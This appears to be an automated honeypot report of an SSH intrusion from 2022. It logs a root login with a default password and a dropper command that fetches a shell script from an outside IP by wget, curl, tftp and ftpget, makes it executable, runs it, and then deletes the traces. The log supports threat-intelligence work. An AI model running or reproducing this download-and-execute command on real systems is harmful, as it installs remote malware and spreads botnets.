Attack Report for Observation

Header

Time: 2022/07/27, 22:53:05 (GMT)

Transaction ID: F1M8V30UHUO61R8K

Service: ssh

Location: FR (France)

Attacker: 145.239.11.61

Classification: Web script execution

Harm Potential: High

Description: Execution of a script downloaded from the web (www)

Content

145.239.11.61 client username 'root' and password 'default' entered
145.239.11.61 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.187.87.141/catvsdog.sh; curl -O http://37.187.87.141/catvsdog.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp 37.187.87.141 -c get 0xt984767.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp -r catvsdog.sh -g 37.187.87.141; chmod 777 catvsdog.sh; sh catvsdog.sh; ftpget -v -u anonymous -p anonymous -P 21 37.187.87.141 catvsdog.sh catvsdog.sh; sh catvsdog.sh; rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh;'

All observations come from the honeypot central database.
